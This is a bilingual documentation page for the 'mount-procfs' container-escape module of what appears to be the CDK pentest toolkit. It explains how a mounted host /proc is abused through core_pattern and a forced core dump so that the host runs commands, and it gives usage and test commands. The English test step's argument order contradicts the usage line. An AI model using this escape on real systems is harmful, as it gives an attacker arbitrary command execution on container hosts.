Exploit: mount procfs

Exploit: mount-procfs

自动化逃逸挂载宿主机/proc目录的容器。

该脚本将用户指定的shell命令指向宿主机/sys/kernel/core_pattern文件，在容器空间通过segment fault触发core dump，进而触发shellcode执行。

Automatic escape container which mounts host process filesystem (usually /proc dir).

This exploit will first point user-defined shell cmd to host /sys/kernel/core_pattern file, then use runtime segment fault to trigger core dump inside container, and the shell code will be executed by target host.

See Also:

• https://wohin.me/rong-qi-tao-yi-gong-fang-xi-lie-yi-tao-yi-ji-zhu-gai-lan/

Usage

cdk run mount-procfs <proc-dir> "<shell-cmd>"
# after exploit, the target host will execute user-specified commands in <shell-cmd> arg.

Example

测试案例

1. 宿主机启动测试容器，挂载宿主机的procfs，尝试逃逸当前容器。docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc --rm -it ubuntu bash
2. 容器内部执行 ./cdk run mount-procfs /mnt/host_proc "touch /tmp/exp-success"
3. 宿主机中出现/tmp/exp-success文件，说明exp已经成功执行，攻击者可以在宿主机执行任意命令。

Testing Case

1. run a container in host docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc --rm -it ubuntu bash, try to escape this container using CDK.
2. attach into the container and execute ./cdk run /mnt/host_proc mount-procfs "touch /tmp/exp-success"
3. back to the host, check /tmp/exp-success file exists, which means our shell cmd was executed successfully. by modifying <shell-cmd> arg you can exec any cmd you want in target host.